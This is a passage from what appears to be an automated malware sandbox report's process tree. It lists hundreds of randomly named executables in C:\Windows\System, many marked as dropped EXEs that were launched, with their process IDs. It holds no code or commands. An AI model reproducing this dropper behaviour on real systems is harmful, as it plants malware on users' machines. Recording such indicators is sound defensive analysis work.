  PID:4708
- C:\Windows\System\ySKQRkp.exe
  C:\Windows\System\ySKQRkp.exe
  2⤵
  - Executes dropped EXE
  PID:2160
- C:\Windows\System\NDhHGYr.exe
  C:\Windows\System\NDhHGYr.exe
  2⤵
  - Executes dropped EXE
  PID:4544
- C:\Windows\System\foZuQGB.exe
  C:\Windows\System\foZuQGB.exe
  2⤵
  - Executes dropped EXE
  PID:2536
- C:\Windows\System\EZxnSyh.exe
  C:\Windows\System\EZxnSyh.exe
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Windows\System\ndECkKj.exe
  C:\Windows\System\ndECkKj.exe
  2⤵
  - Executes dropped EXE
  PID:1104
- C:\Windows\System\uZudgbu.exe
  C:\Windows\System\uZudgbu.exe
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Windows\System\xvDXxCI.exe
  C:\Windows\System\xvDXxCI.exe
  2⤵
  - Executes dropped EXE
  PID:4728
- C:\Windows\System\ySBTsDy.exe
  C:\Windows\System\ySBTsDy.exe
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Windows\System\kgtHQtO.exe
  C:\Windows\System\kgtHQtO.exe
  2⤵
  - Executes dropped EXE
  PID:532
- C:\Windows\System\zYmxDhK.exe
  C:\Windows\System\zYmxDhK.exe
  2⤵
  - Executes dropped EXE
  PID:3700
- C:\Windows\System\HmuCmju.exe
  C:\Windows\System\HmuCmju.exe
  2⤵
  - Executes dropped EXE
  PID:3376
- C:\Windows\System\SEmJOkR.exe
  C:\Windows\System\SEmJOkR.exe
  2⤵
  - Executes dropped EXE
  PID:2376
- C:\Windows\System\CPPNPoM.exe
  C:\Windows\System\CPPNPoM.exe
  2⤵
  - Executes dropped EXE
  PID:1516
- C:\Windows\System\wiWFsMr.exe
  C:\Windows\System\wiWFsMr.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\oxHSTss.exe
  C:\Windows\System\oxHSTss.exe
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Windows\System\pORPXAf.exe
  C:\Windows\System\pORPXAf.exe
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Windows\System\BQZGvKX.exe
  C:\Windows\System\BQZGvKX.exe
  2⤵
  - Executes dropped EXE
  PID:1080
- C:\Windows\System\kQcFxjQ.exe
  C:\Windows\System\kQcFxjQ.exe
  2⤵
  - Executes dropped EXE
  PID:5004
- C:\Windows\System\pWULHJg.exe
  C:\Windows\System\pWULHJg.exe
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Windows\System\edXHlXH.exe
  C:\Windows\System\edXHlXH.exe
  2⤵
  - Executes dropped EXE
  PID:1984
- C:\Windows\System\pTICUJK.exe
  C:\Windows\System\pTICUJK.exe
  2⤵
  - Executes dropped EXE
  PID:2384
- C:\Windows\System\eOJQJvJ.exe
  C:\Windows\System\eOJQJvJ.exe
  2⤵
  - Executes dropped EXE
  PID:2056
- C:\Windows\System\TZbCjMG.exe
  C:\Windows\System\TZbCjMG.exe
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Windows\System\khdcgXs.exe
  C:\Windows\System\khdcgXs.exe
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Windows\System\AwskqAo.exe
  C:\Windows\System\AwskqAo.exe
  2⤵
  - Executes dropped EXE
  PID:4812
- C:\Windows\System\jnktShc.exe
  C:\Windows\System\jnktShc.exe
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\Windows\System\YUiYEIe.exe
  C:\Windows\System\YUiYEIe.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- C:\Windows\System\gilvXEB.exe
  C:\Windows\System\gilvXEB.exe
  2⤵
  - Executes dropped EXE
  PID:636
- C:\Windows\System\ZQFFOpZ.exe
  C:\Windows\System\ZQFFOpZ.exe
  2⤵
  - Executes dropped EXE
  PID:2620
- C:\Windows\System\RTukStt.exe
  C:\Windows\System\RTukStt.exe
  2⤵
  - Executes dropped EXE
  PID:984
- C:\Windows\System\pLapDrm.exe
  C:\Windows\System\pLapDrm.exe
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Windows\System\LaCyDYp.exe
  C:\Windows\System\LaCyDYp.exe
  2⤵
  - Executes dropped EXE
  PID:2968
- C:\Windows\System\gWKDepv.exe
  C:\Windows\System\gWKDepv.exe
  2⤵
  - Executes dropped EXE
  PID:700
- C:\Windows\System\cvMtBMK.exe
  C:\Windows\System\cvMtBMK.exe
  2⤵
  - Executes dropped EXE
  PID:1340
- C:\Windows\System\LBcuisa.exe
  C:\Windows\System\LBcuisa.exe
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Windows\System\CuwZMqK.exe
  C:\Windows\System\CuwZMqK.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Windows\System\RcpksKn.exe
  C:\Windows\System\RcpksKn.exe
  2⤵
  - Executes dropped EXE
  PID:3540
- C:\Windows\System\aWdQUZc.exe
  C:\Windows\System\aWdQUZc.exe
  2⤵
  - Executes dropped EXE
  PID:2000
- C:\Windows\System\qVIpzRE.exe
  C:\Windows\System\qVIpzRE.exe
  2⤵
  - Executes dropped EXE
  PID:3444
- C:\Windows\System\NkzqthD.exe
  C:\Windows\System\NkzqthD.exe
  2⤵
  - Executes dropped EXE
  PID:780
- C:\Windows\System\awvHqVp.exe
  C:\Windows\System\awvHqVp.exe
  2⤵
  - Executes dropped EXE
  PID:4872
- C:\Windows\System\TIBTdoU.exe
  C:\Windows\System\TIBTdoU.exe
  2⤵
  - Executes dropped EXE
  PID:4604
- C:\Windows\System\CLcOKiI.exe
  C:\Windows\System\CLcOKiI.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Windows\System\DKvOkDE.exe
  C:\Windows\System\DKvOkDE.exe
  2⤵
  PID:1572
- C:\Windows\System\dhBxakH.exe
  C:\Windows\System\dhBxakH.exe
  2⤵
  PID:1908
- C:\Windows\System\AkBXvVG.exe
  C:\Windows\System\AkBXvVG.exe
  2⤵
  PID:3748
- C:\Windows\System\DdgHwNz.exe
  C:\Windows\System\DdgHwNz.exe
  2⤵
  PID:4772
- C:\Windows\System\fGNPGYv.exe
  C:\Windows\System\fGNPGYv.exe
  2⤵
  PID:4492
- C:\Windows\System\YisFwOW.exe
  C:\Windows\System\YisFwOW.exe
  2⤵
  PID:1400
- C:\Windows\System\TvpMnzb.exe
  C:\Windows\System\TvpMnzb.exe
  2⤵
  PID:1452
- C:\Windows\System\zhVOTOC.exe
  C:\Windows\System\zhVOTOC.exe
  2⤵
  PID:3092
- C:\Windows\System\jkodVaE.exe
  C:\Windows\System\jkodVaE.exe
  2⤵
  PID:4496
- C:\Windows\System\upZZNHz.exe
  C:\Windows\System\upZZNHz.exe
  2⤵
  PID:1568
- C:\Windows\System\fVbuptn.exe
  C:\Windows\System\fVbuptn.exe
  2⤵
  PID:4124
- C:\Windows\System\qLAXWuY.exe
  C:\Windows\System\qLAXWuY.exe
  2⤵
  PID:3248
- C:\Windows\System\rjlXoyE.exe
  C:\Windows\System\rjlXoyE.exe
  2⤵
  PID:5148
- C:\Windows\System\XRmWhjp.exe
  C:\Windows\System\XRmWhjp.exe
  2⤵
  PID:5180
- C:\Windows\System\yfFSqiB.exe
  C:\Windows\System\yfFSqiB.exe
  2⤵
  PID:5208
- C:\Windows\System\UcLrKwk.exe
  C:\Windows\System\UcLrKwk.exe
  2⤵
  PID:5236
- C:\Windows\System\jCwddPu.exe
  C:\Windows\System\jCwddPu.exe
  2⤵
  PID:5264
- C:\Windows\System\lDCjKsT.exe
  C:\Windows\System\lDCjKsT.exe
  2⤵
  PID:5292
- C:\Windows\System\LaociWc.exe
  C:\Windows\System\LaociWc.exe
  2⤵
  PID:5320
- C:\Windows\System\aPAMels.exe
  C:\Windows\System\aPAMels.exe
  2⤵
  PID:5348
- C:\Windows\System\tPIZegY.exe
  C:\Windows\System\tPIZegY.exe
  2⤵
  PID:5376
- C:\Windows\System\ZqGXMVl.exe
  C:\Windows\System\ZqGXMVl.exe
  2⤵
  PID:5404
- C:\Windows\System\habAoLJ.exe
  C:\Windows\System\habAoLJ.exe
  2⤵
  PID:5432
- C:\Windows\System\mYLiGsw.exe
  C:\Windows\System\mYLiGsw.exe
  2⤵
  PID:5460
- C:\Windows\System\gkUCTWz.exe
  C:\Windows\System\gkUCTWz.exe
  2⤵
  PID:5484
- C:\Windows\System\XrGUUvn.exe
  C:\Windows\System\XrGUUvn.exe
  2⤵
  PID:5520
- C:\Windows\System\rVAkbyg.exe
  C:\Windows\System\rVAkbyg.exe
  2⤵
  PID:5544
- C:\Windows\System\BpwHFUr.exe
  C:\Windows\System\BpwHFUr.exe
  2⤵
  PID:5576
- C:\Windows\System\ZTlaJHP.exe
  C:\Windows\System\ZTlaJHP.exe
  2⤵
  PID:5612
- C:\Windows\System\DCXsWuc.exe
  C:\Windows\System\DCXsWuc.exe
  2⤵
  PID:5640
- C:\Windows\System\AnTdixY.exe
  C:\Windows\System\AnTdixY.exe
  2⤵
  PID:5668
- C:\Windows\System\jxLsAWJ.exe
  C:\Windows\System\jxLsAWJ.exe
  2⤵
  PID:5696
- C:\Windows\System\AlgeRsM.exe
  C:\Windows\System\AlgeRsM.exe
  2⤵
  PID:5724
- C:\Windows\System\XYiOEDi.exe
  C:\Windows\System\XYiOEDi.exe
  2⤵
  PID:5752
- C:\Windows\System\DQKVTAM.exe
  C:\Windows\System\DQKVTAM.exe
  2⤵
  PID:5780
- C:\Windows\System\KjrTxYg.exe
  C:\Windows\System\KjrTxYg.exe
  2⤵
  PID:5808
- C:\Windows\System\OGKuRpC.exe
  C:\Windows\System\OGKuRpC.exe
  2⤵
  PID:5836
- C:\Windows\System\opubMAj.exe
  C:\Windows\System\opubMAj.exe
  2⤵
  PID:5864
- C:\Windows\System\JNpNjkw.exe
  C:\Windows\System\JNpNjkw.exe
  2⤵
  PID:5892
- C:\Windows\System\bLCGKIN.exe
  C:\Windows\System\bLCGKIN.exe
  2⤵
  PID:5920
- C:\Windows\System\CKxYmIX.exe
  C:\Windows\System\CKxYmIX.exe
  2⤵
  PID:5948
- C:\Windows\System\wnoMSle.exe
  C:\Windows\System\wnoMSle.exe
  2⤵
  PID:5976
- C:\Windows\System\akZLFVX.exe
  C:\Windows\System\akZLFVX.exe
  2⤵
  PID:6004
- C:\Windows\System\oNXpDUa.exe
  C:\Windows\System\oNXpDUa.exe
  2⤵
  PID:6032
- C:\Windows\System\qkiBSoI.exe
  C:\Windows\System\qkiBSoI.exe
  2⤵
  PID:6060
- C:\Windows\System\sEMlEYp.exe
  C:\Windows\System\sEMlEYp.exe
  2⤵
  PID:6088
- C:\Windows\System\cyTwrrX.exe
  C:\Windows\System\cyTwrrX.exe
  2⤵
  PID:6116
- C:\Windows\System\AjTPGvH.exe
  C:\Windows\System\AjTPGvH.exe
  2⤵
  PID:4184
- C:\Windows\System\UBPglTS.exe
  C:\Windows\System\UBPglTS.exe
  2⤵
  PID:5072
- C:\Windows\System\LJinVAw.exe
  C:\Windows\System\LJinVAw.exe
  2⤵
  PID:4128
- C:\Windows\System\PeamiXd.exe
  C:\Windows\System\PeamiXd.exe
  2⤵
  PID:1992
- C:\Windows\System\XOoYLsW.exe
  C:\Windows\System\XOoYLsW.exe
  2⤵
  PID:3972
- C:\Windows\System\gktljHE.exe
  C:\Windows\System\gktljHE.exe
  2⤵
  PID:2520
- C:\Windows\System\BKrwPWq.exe
  C:\Windows\System\BKrwPWq.exe
  2⤵
  PID:5144
- C:\Windows\System\jcyOgaO.exe
  C:\Windows\System\jcyOgaO.exe
  2⤵
  PID:5220
- C:\Windows\System\siUFQnt.exe
  C:\Windows\System\siUFQnt.exe
  2⤵
  PID:5280
- C:\Windows\System\uDusVft.exe
  C:\Windows\System\uDusVft.exe
  2⤵
  PID:5340
- C:\Windows\System\qUQrGiR.exe
  C:\Windows\System\qUQrGiR.exe
  2⤵
  PID:5396
- C:\Windows\System\IXRZEjE.exe
  C:\Windows\System\IXRZEjE.exe
  2⤵
  PID:5472
- C:\Windows\System\uNccDFY.exe
  C:\Windows\System\uNccDFY.exe
  2⤵
  PID:5536
- C:\Windows\System\fOuLJig.exe
  C:\Windows\System\fOuLJig.exe
  2⤵
  PID:5600
- C:\Windows\System\hsQsdtE.exe
  C:\Windows\System\hsQsdtE.exe
  2⤵
  PID:5660
- C:\Windows\System\SiTWbFi.exe
  C:\Windows\System\SiTWbFi.exe
  2⤵
  PID:5736
- C:\Windows\System\CNrgOQt.exe
  C:\Windows\System\CNrgOQt.exe
  2⤵
  PID:5796
- C:\Windows\System\qqXchbZ.exe
  C:\Windows\System\qqXchbZ.exe
  2⤵
  PID:5856
- C:\Windows\System\dKHdbtR.exe
  C:\Windows\System\dKHdbtR.exe
  2⤵
  PID:5912
- C:\Windows\System\RacSqCa.exe
  C:\Windows\System\RacSqCa.exe
  2⤵
  PID:5988
- C:\Windows\System\jHCdcKC.exe
  C:\Windows\System\jHCdcKC.exe
  2⤵
  PID:6048
- C:\Windows\System\IAHYKLw.exe
  C:\Windows\System\IAHYKLw.exe
  2⤵
  PID:6104
- C:\Windows\System\QWIfLZV.exe
  C:\Windows\System\QWIfLZV.exe
  2⤵
  PID:3732
- C:\Windows\System\rdivxro.exe
  C:\Windows\System\rdivxro.exe
  2⤵
  PID:2344
- C:\Windows\System\TLvLBfL.exe
  C:\Windows\System\TLvLBfL.exe
  2⤵
  PID:4712
- C:\Windows\System\PSBrKSE.exe
  C:\Windows\System\PSBrKSE.exe
  2⤵
  PID:5260
- C:\Windows\System\mEScBSx.exe
  C:\Windows\System\mEScBSx.exe
  2⤵
  PID:5424
- C:\Windows\System\MkQqSDX.exe
  C:\Windows\System\MkQqSDX.exe
  2⤵
  PID:5572
- C:\Windows\System\mIUVOwB.exe
  C:\Windows\System\mIUVOwB.exe
  2⤵
  PID:5764
- C:\Windows\System\byNjhNM.exe
  C:\Windows\System\byNjhNM.exe
  2⤵
  PID:5884
- C:\Windows\System\zeCfUVS.exe
  C:\Windows\System\zeCfUVS.exe
  2⤵
  PID:1176
- C:\Windows\System\gOSuiYz.exe
  C:\Windows\System\gOSuiYz.exe
  2⤵
  PID:3128
- C:\Windows\System\xCpfVHr.exe
  C:\Windows\System\xCpfVHr.exe
  2⤵
  PID:6168
- C:\Windows\System\wloDHyS.exe
  C:\Windows\System\wloDHyS.exe
  2⤵
  PID:6196
- C:\Windows\System\JgGDBIq.exe
  C:\Windows\System\JgGDBIq.exe
  2⤵
  PID:6224
- C:\Windows\System\DtHuOBM.exe
  C:\Windows\System\DtHuOBM.exe
  2⤵
  PID:6252
- C:\Windows\System\GipolHg.exe
  C:\Windows\System\GipolHg.exe
  2⤵
  PID:6280
- C:\Windows\System\yjYxzqJ.exe
  C:\Windows\System\yjYxzqJ.exe
  2⤵
  PID:6308
- C:\Windows\System\IVOOQfP.exe
  C:\Windows\System\IVOOQfP.exe
  2⤵
  PID:6336
- C:\Windows\System\wMNUcbl.exe
  C:\Windows\System\wMNUcbl.exe
  2⤵
  PID:6364
- C:\Windows\System\ednkYca.exe
  C:\Windows\System\ednkYca.exe
  2⤵
  PID:6392
- C:\Windows\System\nKPghuf.exe
  C:\Windows\System\nKPghuf.exe
  2⤵
  PID:6420
- C:\Windows\System\sxmYgbL.exe
  C:\Windows\System\sxmYgbL.exe
  2⤵
  PID:6448
- C:\Windows\System\thItsUW.exe
  C:\Windows\System\thItsUW.exe
  2⤵
  PID:6476
- C:\Windows\System\sulWueU.exe
  C:\Windows\System\sulWueU.exe
  2⤵
  PID:6504
- C:\Windows\System\VlTOxGY.exe
  C:\Windows\System\VlTOxGY.exe
  2⤵
  PID:6532
- C:\Windows\System\OeQqCpV.exe
  C:\Windows\System\OeQqCpV.exe
  2⤵
  PID:6560
- C:\Windows\System\ZgnJybJ.exe
  C:\Windows\System\ZgnJybJ.exe
  2⤵
  PID:6588
- C:\Windows\System\XBnPJLo.exe
  C:\Windows\System\XBnPJLo.exe
  2⤵
  PID:6616
- C:\Windows\System\JEuKwEU.exe
  C:\Windows\System\JEuKwEU.exe
  2⤵
  PID:6644
- C:\Windows\System\xDDEcpk.exe
  C:\Windows\System\xDDEcpk.exe
  2⤵
  PID:6672
- C:\Windows\System\TKfvGrJ.exe
  C:\Windows\System\TKfvGrJ.exe
  2⤵
  PID:6704
- C:\Windows\System\YkEXkdK.exe
  C:\Windows\System\YkEXkdK.exe
  2⤵
  PID:6728
- C:\Windows\System\kPFIzMF.exe
  C:\Windows\System\kPFIzMF.exe
  2⤵
  PID:6756
- C:\Windows\System\eAYTiHx.exe
  C:\Windows\System\eAYTiHx.exe
  2⤵
  PID:6784
- C:\Windows\System\kpqwWfl.exe
  C:\Windows\System\kpqwWfl.exe
  2⤵
  PID:6812
- C:\Windows\System\dCrSxOf.exe
  C:\Windows\System\dCrSxOf.exe
  2⤵
  PID:6840
- C:\Windows\System\WNmtLeh.exe
  C:\Windows\System\WNmtLeh.exe
  2⤵
  PID:6868
- C:\Windows\System\AfKrfLa.exe
  C:\Windows\System\AfKrfLa.exe
  2⤵
  PID:6896
- C:\Windows\System\sCXLUiy.exe
  C:\Windows\System\sCXLUiy.exe
  2⤵
  PID:6924
- C:\Windows\System\UgnwDNx.exe
  C:\Windows\System\UgnwDNx.exe
  2⤵
  PID:6952
- C:\Windows\System\wftkTxo.exe
  C:\Windows\System\wftkTxo.exe
  2⤵
  PID:6980
- C:\Windows\System\gKcZnVb.exe
  C:\Windows\System\gKcZnVb.exe
  2⤵
  PID:7008
- C:\Windows\System\wgCKGRz.exe
  C:\Windows\System\wgCKGRz.exe
  2⤵
  PID:7036
- C:\Windows\System\CvZMPBU.exe
  C:\Windows\System\CvZMPBU.exe
  2⤵
  PID:7064
- C:\Windows\System\bAVQZid.exe
  C:\Windows\System\bAVQZid.exe
  2⤵
  PID:7092
- C:\Windows\System\ZCauwSq.exe
  C:\Windows\System\ZCauwSq.exe
  2⤵
  PID:7120
- C:\Windows\System\RxALxTt.exe
  C:\Windows\System\RxALxTt.exe
  2⤵
  PID:7148
- C:\Windows\System\AcbWsaR.exe
  C:\Windows\System\AcbWsaR.exe
  2⤵
  PID:1504
- C:\Windows\System\tOutOlr.exe
  C:\Windows\System\tOutOlr.exe
  2⤵
  PID:1684
- C:\Windows\System\hUtoVZT.exe
  C:\Windows\System\hUtoVZT.exe
  2⤵
  PID:5632
- C:\Windows\System\WDEycgP.exe
  C:\Windows\System\WDEycgP.exe
  2⤵
  PID:5960
- C:\Windows\System\PTDCpBr.exe
  C:\Windows\System\PTDCpBr.exe
  2⤵
  PID:6160
- C:\Windows\System\IWZOgmq.exe
  C:\Windows\System\IWZOgmq.exe
  2⤵
  PID:6236
- C:\Windows\System\AguASmH.exe
  C:\Windows\System\AguASmH.exe
  2⤵
  PID:6296
- C:\Windows\System\jqWaHlV.exe
  C:\Windows\System\jqWaHlV.exe
  2⤵
  PID:6356
- C:\Windows\System\cLJoVuu.exe
  C:\Windows\System\cLJoVuu.exe
  2⤵
  PID:6432
- C:\Windows\System\NhHqJGl.exe
  C:\Windows\System\NhHqJGl.exe
  2⤵
  PID:6492
- C:\Windows\System\vuGthRK.exe
  C:\Windows\System\vuGthRK.exe
  2⤵
  PID:6548
- C:\Windows\System\kjqfWbd.exe
  C:\Windows\System\kjqfWbd.exe
  2⤵
  PID:6608
- C:\Windows\System\HTnclFu.exe
  C:\Windows\System\HTnclFu.exe
  2⤵
  PID:6684
- C:\Windows\System\RlHHfvt.exe
  C:\Windows\System\RlHHfvt.exe
  2⤵
  PID:6744
- C:\Windows\System\utzimEX.exe
  C:\Windows\System\utzimEX.exe
  2⤵
  PID:6800
- C:\Windows\System\MgkjQaf.exe
  C:\Windows\System\MgkjQaf.exe
  2⤵
  PID:6860
- C:\Windows\System\CjtfqWr.exe
  C:\Windows\System\CjtfqWr.exe
  2⤵
  PID:6936
- C:\Windows\System\bTIOMml.exe
  C:\Windows\System\bTIOMml.exe
  2⤵
  PID:6996
- C:\Windows\System\kofKUMG.exe
  C:\Windows\System\kofKUMG.exe
  2⤵
  PID:7052
- C:\Windows\System\WuIOgvr.exe
  C:\Windows\System\WuIOgvr.exe
  2⤵
  PID:7108
- C:\Windows\System\MFiXcmx.exe
  C:\Windows\System\MFiXcmx.exe
  2⤵
  PID:4104
- C:\Windows\System\enDEgmD.exe
  C:\Windows\System\enDEgmD.exe
  2⤵
  PID:5772
- C:\Windows\System\fypQfQX.exe
  C:\Windows\System\fypQfQX.exe
  2⤵
  PID:6208
- C:\Windows\System\ShXLTPP.exe
  C:\Windows\System\ShXLTPP.exe
  2⤵
  PID:6348
- C:\Windows\System\NMHszXd.exe
  C:\Windows\System\NMHszXd.exe
  2⤵
  PID:6464
- C:\Windows\System\AWCUaXV.exe
  C:\Windows\System\AWCUaXV.exe
  2⤵
  PID:6600
- C:\Windows\System\jJnLHEi.exe
  C:\Windows\System\jJnLHEi.exe
  2⤵
  PID:6724
- C:\Windows\System\CfrCjjn.exe
  C:\Windows\System\CfrCjjn.exe
  2⤵
  PID:6852
- C:\Windows\System\Pohdgcy.exe
  C:\Windows\System\Pohdgcy.exe
  2⤵
  PID:7024
- C:\Windows\System\QCQRhmk.exe
  C:\Windows\System\QCQRhmk.exe
  2⤵
  PID:2948
- C:\Windows\System\vhtdDHN.exe
  C:\Windows\System\vhtdDHN.exe
  2⤵
  PID:6076
- C:\Windows\System\YtcxBmr.exe
  C:\Windows\System\YtcxBmr.exe
  2⤵
  PID:7176
- C:\Windows\System\hyxkJNZ.exe
  C:\Windows\System\hyxkJNZ.exe
  2⤵
  PID:7204
- C:\Windows\System\UAueYLy.exe
  C:\Windows\System\UAueYLy.exe
  2⤵
  PID:7232
- C:\Windows\System\ZyFYVmS.exe
  C:\Windows\System\ZyFYVmS.exe
  2⤵
  PID:7260
- C:\Windows\System\WxfQAsD.exe
  C:\Windows\System\WxfQAsD.exe
  2⤵
  PID:7288
- C:\Windows\System\vPlsVDp.exe
  C:\Windows\System\vPlsVDp.exe
  2⤵
  PID:7316
- C:\Windows\System\NvWBRfp.exe
  C:\Windows\System\NvWBRfp.exe
  2⤵
  PID:7344
- C:\Windows\System\ecNyWaj.exe
  C:\Windows\System\ecNyWaj.exe
  2⤵
  PID:7372
- C:\Windows\System\UxfMtZt.exe
  C:\Windows\System\UxfMtZt.exe
  2⤵
  PID:7400
- C:\Windows\System\OCtxMZb.exe
  C:\Windows\System\OCtxMZb.exe
  2⤵
  PID:7428
- C:\Windows\System\PMHHkbx.exe
  C:\Windows\System\PMHHkbx.exe
  2⤵
  PID:7456
- C:\Windows\System\MGmqLng.exe
  C:\Windows\System\MGmqLng.exe
  2⤵
  PID:7484
- C:\Windows\System\kMoFItr.exe
  C:\Windows\System\kMoFItr.exe
  2⤵
  PID:7512
- C:\Windows\System\VCgAOvX.exe
  C:\Windows\System\VCgAOvX.exe
  2⤵
  PID:7540
- C:\Windows\System\hmMGlgD.exe
  C:\Windows\System\hmMGlgD.exe
  2⤵
  PID:7568
- C:\Windows\System\VduwbOS.exe
  C:\Windows\System\VduwbOS.exe
  2⤵
  PID:7596
- C:\Windows\System\cJrWwwJ.exe
  C:\Windows\System\cJrWwwJ.exe
  2⤵
  PID:7620
- C:\Windows\System\IkkvUye.exe
  C:\Windows\System\IkkvUye.exe
  2⤵
  PID:7652
- C:\Windows\System\jUzyXJN.exe
  C:\Windows\System\jUzyXJN.exe
  2⤵
  PID:7680
- C:\Windows\System\HievlfN.exe
  C:\Windows\System\HievlfN.exe
  2⤵
  PID:7708
- C:\Windows\System\nEnrqZN.exe
  C:\Windows\System\nEnrqZN.exe
  2⤵
  PID:7736
- C:\Windows\System\pdVYKLc.exe
  C:\Windows\System\pdVYKLc.exe
  2⤵
  PID:7764
- C:\Windows\System\NAYOSFE.exe
  C:\Windows\System\NAYOSFE.exe
  2⤵
  PID:7792
- C:\Windows\System\etuFHdy.exe
  C:\Windows\System\etuFHdy.exe
  2⤵
  PID:7820
- C:\Windows\System\qVPSjlo.exe
  C:\Windows\System\qVPSjlo.exe
  2⤵
  PID:7848
- C:\Windows\System\StKWxyF.exe
  C:\Windows\System\StKWxyF.exe
  2⤵
  PID:7876
- C:\Windows\System\kzxojPF.exe
  C:\Windows\System\kzxojPF.exe
  2⤵
  PID:7904
- C:\Windows\System\zzVtDmT.exe
  C:\Windows\System\zzVtDmT.exe
  2⤵
  PID:7932
- C:\Windows\System\rdZDCwu.exe
  C:\Windows\System\rdZDCwu.exe
  2⤵
  PID:7960
- C:\Windows\System\JwveAyK.exe
  C:\Windows\System\JwveAyK.exe
  2⤵
  PID:7988
- C:\Windows\System\xwfIeuO.exe
  C:\Windows\System\xwfIeuO.exe
  2⤵
  PID:8016
- C:\Windows\System\lEfCaal.exe
  C:\Windows\System\lEfCaal.exe
  2⤵
  PID:8044
- C:\Windows\System\cBERMOs.exe
  C:\Windows\System\cBERMOs.exe
  2⤵
  PID:8072
- C:\Windows\System\AMRIukl.exe
  C:\Windows\System\AMRIukl.exe
  2⤵
  PID:8100
- C:\Windows\System\LmgzcVz.exe
  C:\Windows\System\LmgzcVz.exe
  2⤵
  PID:6712
- C:\Windows\System\wAboFDy.exe
  C:\Windows\System\wAboFDy.exe
  2⤵
  PID:6152
- C:\Windows\System\vVCmJLK.exe
  C:\Windows\System\vVCmJLK.exe
  2⤵
  PID:7192
- C:\Windows\System\qxEUGFm.exe
  C:\Windows\System\qxEUGFm.exe
  2⤵
  PID:7248
- C:\Windows\System\qEArEph.exe
  C:\Windows\System\qEArEph.exe
  2⤵
  PID:7304
- C:\Windows\System\CGdKOri.exe
  C:\Windows\System\CGdKOri.exe
  2⤵
  PID:7364
- C:\Windows\System\OhSKdxt.exe
  C:\Windows\System\OhSKdxt.exe
  2⤵
  PID:7476
- C:\Windows\System\yYuDYni.exe
  C:\Windows\System\yYuDYni.exe
  2⤵
  PID:7532
- C:\Windows\System\JQbqjgG.exe
  C:\Windows\System\JQbqjgG.exe
  2⤵
  PID:7584
- C:\Windows\System\VyjyvLu.exe
  C:\Windows\System\VyjyvLu.exe
  2⤵
  PID:7644
- C:\Windows\System\hqNxGFT.exe
  C:\Windows\System\hqNxGFT.exe
  2⤵
  PID:4888
- C:\Windows\System\deyiLUL.exe
  C:\Windows\System\deyiLUL.exe
  2⤵
  PID:7692
- C:\Windows\System\PSzUKgP.exe
  C:\Windows\System\PSzUKgP.exe
  2⤵
  PID:7728
- C:\Windows\System\sIGBdyV.exe
  C:\Windows\System\sIGBdyV.exe
  2⤵
  PID:7776
- C:\Windows\System\AojhpVA.exe
  C:\Windows\System\AojhpVA.exe
  2⤵
  PID:876
- C:\Windows\System\sGLRRYK.exe
  C:\Windows\System\sGLRRYK.exe
  2⤵
  PID:840
- C:\Windows\System\WGCpCLj.exe
  C:\Windows\System\WGCpCLj.exe
  2⤵
  PID:7948
- C:\Windows\System\blTcGwO.exe
  C:\Windows\System\blTcGwO.exe
  2⤵
  PID:3104
- C:\Windows\System\EehxZBc.exe
  C:\Windows\System\EehxZBc.exe
  2⤵
  PID:3796
- C:\Windows\System\ylIjZAy.exe
  C:\Windows\System\ylIjZAy.exe
  2⤵
  PID:4788
- C:\Windows\System\FDZgDgA.exe
  C:\Windows\System\FDZgDgA.exe
  2⤵
  PID:2580
- C:\Windows\System\dSaqRJq.exe
  C:\Windows\System\dSaqRJq.exe
  2⤵
  PID:8148
- C:\Windows\System\BKcWvJc.exe
  C:\Windows\System\BKcWvJc.exe
  2⤵
  PID:8140
- C:\Windows\System\HLPlBqu.exe
  C:\Windows\System\HLPlBqu.exe
  2⤵
  PID:7280
- C:\Windows\System\eSGvFjx.exe
  C:\Windows\System\eSGvFjx.exe
  2⤵
  PID:7336
- C:\Windows\System\RcHugfT.exe
  C:\Windows\System\RcHugfT.exe
  2⤵
  PID:2208
- C:\Windows\System\XnEBlWV.exe
  C:\Windows\System\XnEBlWV.exe
  2⤵
  PID:3204
- C:\Windows\System\TLnAWsm.exe
  C:\Windows\System\TLnAWsm.exe
  2⤵
  PID:7812
- C:\Windows\System\kaUHVqo.exe
  C:\Windows\System\kaUHVqo.exe
  2⤵
  PID:6408
- C:\Windows\System\dXdxUlY.exe
  C:\Windows\System\dXdxUlY.exe
  2⤵
  PID:2576
- C:\Windows\System\imjaPWL.exe
  C:\Windows\System\imjaPWL.exe
  2⤵
  PID:2936
- C:\Windows\System\reGwKbJ.exe
  C:\Windows\System\reGwKbJ.exe
  2⤵
  PID:8032
- C:\Windows\System\zCixvXk.exe
  C:\Windows\System\zCixvXk.exe
  2⤵
  PID:8088
- C:\Windows\System\SqxSTps.exe
  C:\Windows\System\SqxSTps.exe
  2⤵
  PID:1224
- C:\Windows\System\PMlQGlE.exe
  C:\Windows\System\PMlQGlE.exe
  2⤵
  PID:7472
- C:\Windows\System\lGdtVxD.exe
  C:\Windows\System\lGdtVxD.exe
  2⤵
  PID:3320
- C:\Windows\System\CSpnVUB.exe
  C:\Windows\System\CSpnVUB.exe
  2⤵
  PID:7748
- C:\Windows\System\ZUyRgzD.exe
  C:\Windows\System\ZUyRgzD.exe
  2⤵
  PID:8004
- C:\Windows\System\ZXAsYgP.exe
  C:\Windows\System\ZXAsYgP.exe
  2⤵
  PID:7272
- C:\Windows\System\PcaQjUI.exe
  C:\Windows\System\PcaQjUI.exe
  2⤵
  PID:704
- C:\Windows\System\NPefufi.exe
  C:\Windows\System\NPefufi.exe
  2⤵
  PID:7976
- C:\Windows\System\uofXJzV.exe
  C:\Windows\System\uofXJzV.exe
  2⤵
  PID:8220
- C:\Windows\System\rSNAbXM.exe
  C:\Windows\System\rSNAbXM.exe
  2⤵
  PID:8276
- C:\Windows\System\TfQLBmH.exe
  C:\Windows\System\TfQLBmH.exe
